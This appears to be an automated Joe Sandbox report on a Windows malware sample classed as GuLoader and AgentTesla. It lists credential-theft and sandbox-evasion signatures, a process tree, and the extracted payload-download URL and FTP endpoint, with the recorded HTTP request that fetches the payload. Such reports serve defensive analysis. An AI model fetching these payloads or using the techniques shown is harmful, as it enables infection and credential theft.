Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe

Overview

General Information

Sample Name:SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe
Analysis ID:635390
MD5:77436b29832ded92b60491ea36018196
SHA1:0314eca204964e3e189b0c0aed7f449e487dc98e
SHA256:b19c8495104c354de9aa1b3403bff2d1211a89fe8892e866d2d8dfd7bb0ba5da
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Antivirus detection for URL or domain
Yara detected GuLoader
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Contains functionality to detect virtual machines (SLDT)
PE file contains more sections than normal
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe (PID: 8616 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe" MD5: 77436B29832DED92B60491EA36018196)
    • CasPol.exe (PID: 8876 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
    • CasPol.exe (PID: 8884 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 8892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
{"Payload URL": "http://donaldtrumpverse.com/kO4_tiMHM116.bin"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.945527558.0000000002B00000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000004.00000002.5727171404.000000001D4B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000004.00000002.5727171404.000000001D4B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000004.00000000.813096057.0000000000F00000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: CasPol.exe PID: 8884JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 1 entries
            No Sigma rule has matched
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000000.00000002.945527558.0000000002B00000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://donaldtrumpverse.com/kO4_tiMHM116.bin"}
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeVirustotal: Detection: 42%Perma Link
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeReversingLabs: Detection: 21%
            Source: ftp://ftp.solucionest.com.ar/officeAvira URL Cloud: Label: malware
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_20409678 CryptUnprotectData,4_2_20409678
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_20409D60 CryptUnprotectData,4_2_20409D60
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PARANTHRACENEJump to behavior
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: msvcr100.i386.pdb source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe, 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmp, msvcr100.dll.0.dr
            Source: Binary string: F:\jnks\workspace\Modern_Psdr_Master_UCDE\CDMDataEventHandlerLibrary\CDMDataEventHandler\obj\Release\net46\CDMDataEventHandler.pdbSHA2562 source: CDMDataEventHandler.dll.0.dr
            Source: Binary string: F:\jnks\workspace\Modern_Psdr_Master_UCDE\CDMDataEventHandlerLibrary\CDMDataEventHandler\obj\Release\net46\CDMDataEventHandler.pdb source: CDMDataEventHandler.dll.0.dr
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C49
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_00406873 FindFirstFileW,FindClose,0_2_00406873
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B

            Networking

            barindex
            Source: Malware configuration extractorURLs: http://donaldtrumpverse.com/kO4_tiMHM116.bin
            Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
            Source: global trafficHTTP traffic detected: GET /kO4_tiMHM116.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: donaldtrumpverse.comCache-Control: no-cache
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
            Source: CasPol.exe, 00000004.00000002.5727171404.000000001D4B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ftp://ftp.solucionest.com.ar/office
            Source: CasPol.exe, 00000004.00000002.5727171404.000000001D4B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: CasPol.exe, 00000004.00000002.5727171404.000000001D4B1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.997300925.000000001C411000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5728626213.000000001D5D1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5728362756.000000001D5A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://42ScOTnxUv4XWwo.net
            Source: CasPol.exe, 00000004.00000002.5727171404.000000001D4B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
            Source: CDMDataEventHandler.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: CDMDataEventHandler.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
            Source: CDMDataEventHandler.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
            Source: CDMDataEventHandler.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
            Source: CDMDataEventHandler.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
            Source: CDMDataEventHandler.dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
            Source: CDMDataEventHandler.dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
            Source: CDMDataEventHandler.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: CDMDataEventHandler.dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
            Source: CDMDataEventHandler.dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
            Source: CasPol.exe, 00000004.00000002.5703889334.0000000001267000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://donaldtrumpverse.com/kO4_tiMHM116.bin
            Source: CasPol.exe, 00000004.00000002.5703889334.0000000001267000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://donaldtrumpverse.com/kO4_tiMHM116.bin2
            Source: CasPol.exe, 00000004.00000002.5727171404.000000001D4B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jGgoxh.com
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: CDMDataEventHandler.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
            Source: CDMDataEventHandler.dll.0.drString found in binary or memory: http://ocsp.digicert.com0N
            Source: CDMDataEventHandler.dll.0.drString found in binary or memory: http://ocsp.digicert.com0O
            Source: CasPol.exe, 00000004.00000002.5728626213.000000001D5D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: CDMDataEventHandler.dll.0.drString found in binary or memory: http://www.digicert.com/CPS0
            Source: CDMDataEventHandler.dll.0.drString found in binary or memory: https://pie-us1.api.ws-hp.com/clienttelemetry
            Source: CDMDataEventHandler.dll.0.drString found in binary or memory: https://schemaregistry.analysis.ext.hp.com/cdm/gun/com.hp.cdm.platform.software.domain.eventing.reso
            Source: CDMDataEventHandler.dll.0.drString found in binary or memory: https://schemaregistry.analysis.ext.hp.com/cdm/id/sw/originatorDetail.schema.json
            Source: CDMDataEventHandler.dll.0.drString found in binary or memory: https://schemaregistry.analysis.ext.hp.com/cdm/id/sw/sysInfoBase.schema.json
            Source: CDMDataEventHandler.dll.0.drString found in binary or memory: https://stage-us1.api.ws-hp.com/clienttelemetry
            Source: CDMDataEventHandler.dll.0.drString found in binary or memory: https://us1.api.ws-hp.com/clienttelemetry
            Source: CDMDataEventHandler.dll.0.drString found in binary or memory: https://www.digicert.com/CPS0
            Source: CasPol.exe, 00000004.00000002.5727171404.000000001D4B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
            Source: unknownDNS traffic detected: queries for: donaldtrumpverse.com
            Source: global trafficHTTP traffic detected: GET /kO4_tiMHM116.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: donaldtrumpverse.comCache-Control: no-cache
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056DE
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_0040755C0_2_0040755C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_00406D850_2_00406D85
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_71081BFF0_2_71081BFF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_00EDC1E04_2_00EDC1E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_00EDDAB04_2_00EDDAB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_00ED7B584_2_00ED7B58
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_00EDF4464_2_00EDF446
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_00ED37C84_2_00ED37C8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_1D2DA1604_2_1D2DA160
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_1D2D98904_2_1D2D9890
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_1D2D95484_2_1D2D9548
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_203E28204_2_203E2820
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_203E2C604_2_203E2C60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_203E8A504_2_203E8A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_203EB6984_2_203EB698
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_203ED7F14_2_203ED7F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_203E79B04_2_203E79B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_2040F4784_2_2040F478
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_2040047B4_2_2040047B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_2040E0E04_2_2040E0E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_204030804_2_20403080
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_204072904_2_20407290
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_20405EA84_2_20405EA8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_2040B8F84_2_2040B8F8
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe, 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemsvcr100_clr0400.dll^ vs SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: edgegdi.dllJump to behavior
            Source: libLerc.dll.0.drStatic PE information: Number of sections : 11 > 10
            Source: libenchant-2.dll.0.drStatic PE information: Number of sections : 12 > 10
            Source: gspawn-win64-helper.exe.0.drStatic PE information: Number of sections : 11 > 10
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeVirustotal: Detection: 42%
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeReversingLabs: Detection: 21%
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeJump to behavior
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe" Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe" Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeFile created: C:\Users\user\AppData\Local\Temp\nst89F3.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/12@3/1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_0040498A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
            Source: CDMDataEventHandler.dll.0.dr, Hp.CDMDataEventHandler/Sender/TelemetrySender.csBase64 encoded string: 'uWg5oksEUHoewK5WcwMNmfkglf2HF7AWQAGHYz0VfFMeg1YF2aEU/2OPoeETAl78'
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8892:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8892:120:WilError_03
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PARANTHRACENEJump to behavior
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: msvcr100.i386.pdb source: SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe, 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmp, msvcr100.dll.0.dr
            Source: Binary string: F:\jnks\workspace\Modern_Psdr_Master_UCDE\CDMDataEventHandlerLibrary\CDMDataEventHandler\obj\Release\net46\CDMDataEventHandler.pdbSHA2562 source: CDMDataEventHandler.dll.0.dr
            Source: Binary string: F:\jnks\workspace\Modern_Psdr_Master_UCDE\CDMDataEventHandlerLibrary\CDMDataEventHandler\obj\Release\net46\CDMDataEventHandler.pdb source: CDMDataEventHandler.dll.0.dr

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.945527558.0000000002B00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.813096057.0000000000F00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_710830C0 push eax; ret 0_2_710830EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_00ED849F push edi; retn 0000h4_2_00ED84A1
            Source: gspawn-win64-helper.exe.0.drStatic PE information: section name: .xdata
            Source: libLerc.dll.0.drStatic PE information: section name: .xdata
            Source: libenchant-2.dll.0.drStatic PE information: section name: .xdata
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeCode function: 0_2_71081BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_71081BFF
            Source: CDMDataEventHandler.dll.0.drStatic PE information: 0x9C213F02 [Thu Jan 2 09:55:14 2053 UTC]
            Source: initial sampleStatic PE information: section name: .text entropy: 6.90904492268
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeFile created: C:\Users\user\AppData\Local\Temp\libenchant-2.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeFile created: C:\Users\user\AppData\Local\Temp\libLerc.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeFile created: C:\Users\user\AppData\Local\Temp\msvcr100.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeFile created: C:\Users\user\AppData\Local\Temp\nsy8A61.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeFile created: C:\Users\user\AppData\Local\Temp\gspawn-win64-helper.exeJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeFile created: C:\Users\user\AppData\Local\Temp\CDMDataEventHandler.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
